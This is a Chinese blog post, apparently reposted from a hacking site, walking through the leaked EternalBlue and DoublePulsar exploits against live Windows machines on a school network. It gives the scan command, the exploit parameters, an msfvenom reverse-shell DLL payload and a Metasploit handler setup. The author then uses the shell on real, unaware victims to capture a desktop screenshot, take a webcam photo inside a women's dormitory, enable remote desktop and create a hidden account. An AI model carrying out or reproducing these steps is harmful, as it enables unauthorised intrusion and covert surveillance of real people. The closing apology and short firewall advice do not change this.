IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    利用方程式组织黑客工具包盲打Windows,误伤女寝

    -Y.c发表于 2017-04-27 02:18:37
    love 0

    准备环境

    kalilinux 监听机,或者装有msf和nmap的linux即可,桥接物理机网络

    win03 攻击机 python2.6 + pywin32 环境 桥接

    exp下载链接 https://github.com/misterch0c/shadowbroker

    python-2.6.6.msi
    https://www.python.org/download/releases/2.6.6/

    pywin32-221.win32-py2.6.exe
    https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

    靶机:不用本地的靶机,虽然测试成功了,但是要实战才有意思。所以扫本地的C段。


    配置攻击机1【win2003】

    把下载的exp压缩包中Windows目录解压到攻击机上,不要解压到有中文目录的路径,不然会报错,解压完后,我们在Windows目录下新建一个空目录“listeningposts”,为什么要建立这个目录,因为fb.py中有个遍历目录的参数,对应的就是这个目录,默认是没有的。

    利用nmap扫下C段,看有哪些机器开了445端口,主要针对win4 64 的主机进行试验。

    nmap -p 445 -O 10.20.70.0/24   
    扫描整个C段开放445端口的主机,并且探测系统版本。

    针对目标主机 10.20.70.x

    然后运行fb.py脚本,设置参数

    攻击目标

    [?] Default Target IP Address [] : 10.20.70.x

    本机IP
    [?] Default Callback IP Address [] : 10.20.88.207

    是否重定向
    [?] Use Redirection [yes] : no

    是否输出日志
    [?] Base Log directory [D:\logs] : no

    根据提示,新建一个项目,然后默认设置,直到设置
    use eternalblue

    设置好选择Yes,然后一路回车默认,直到出现选择针对的目标系统和加载的MODE

    这里我都选择1,因为我针对的系统是X64的win7,MODE用本身自带的一个fuzz框架。然后一路YES回车,直到出现

    输入 use doublepulsar

    然后一样默认设置回车yes,直到出现要我们再次设置攻击目标的信息,选择SMB服务,x64系统,利用RunDLL模块。

    到这里,配置这个exp已经差不多了,这时候打开kalilinux,利用msf配置一个DLL的后门,因为刚才我的fb.py利用的模块是RUNDLL。


    配置攻击机2【kalilinux】

    利用msf生成一个x64位的dll后门

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.20.89.101 LPORT=5555 -f dll > s.dll

    然后msfconlse 打开msf

    设置参数开启侦听


    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
    payload => windows/x64/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 10.20.89.101
    lhost => 10.20.89.101
    msf exploit(handler) > set lport 5555
    lport => 5555
    msf exploit(handler) > exploit

    设置完kalilinux,把刚才生成的dll后门,放到win03攻击机1的C盘目录下。

    然后在攻击机1下设置开始攻击。

    这时候,kalilinux下反弹了一个shell回来,成功了,HELP一下,看看这个shell有什么功能

    功能挺多,运行一下截图桌面的命令。
    screenshot

    原来在看爱奇艺

    看到拍照功能,试验一下。
    webcam_snap
    竟然一不小心盲到了女寝的C段,学校的wif IP是随机分配的,好吧,我不是有意的,因为隐私问题固打码,看样子妹子也是一脸懵逼,估计摄像头的灯亮了下。:P

    运行shell,获取一个system的权限,利用命令开3389,并且创建隐藏账户

    功能还有很多,可以利用system权限远程下载一个远控等等,自己挖掘,这里就不继续演示了。排版可能有问题,凑合看吧!


    总结

    这个漏洞基本是通杀的,真的非常可怕,分析了下源码发现全是自带的库,无奈编程太菜,看了下网上的分析,发现这个漏洞也是基于堆栈的底层溢出,底层的东西我相信还有更多的漏洞没被挖掘出来,无法想象真正的黑客组织手里的0day有多可怕,也让我看到了差距有多大。

    两个字总结:震撼!

    注:图片本人已经删除了,虽然打了马赛克,但是对于别人造成的影响还是有的,如果在上面的文章中对其事件人物造成了影响,在这里说声抱歉,敬以歉意。
    虽然是实战但是涉及到一些隐私问题,一张打了马赛克的照片,和关了爱奇艺,其他本人保证绝对没有做!希望其他论坛和网站转载了本篇文章的朋友请删除相应的内容,再次申明,其他论坛转载文章发生的法律关系与本人无任何关系!
    我写这篇文章的目的不是为了教大家怎么去入侵,虽然标题有点扎眼:)
    只是希望在安全问题这个方面,引起大家的重视。

    对于这个漏洞的防御方法,我的建议是开启防火墙,做一个tcp连接的入站规则阻止,或者直接卸载掉445端口,

    参考文章:http://www.jb51.net/hack/95788.html
    http://mp.weixin.qq.com/s?__biz=MzIyNTA1NzAxOA==&mid=502990295&idx=1&sn=181c1e9b01854b87d3d4752c593c4dd4&chksm=700a2442477da

    原文地址:http://fjhack.me/2017/04/16/08/



沪ICP备19023445号-2号
友情链接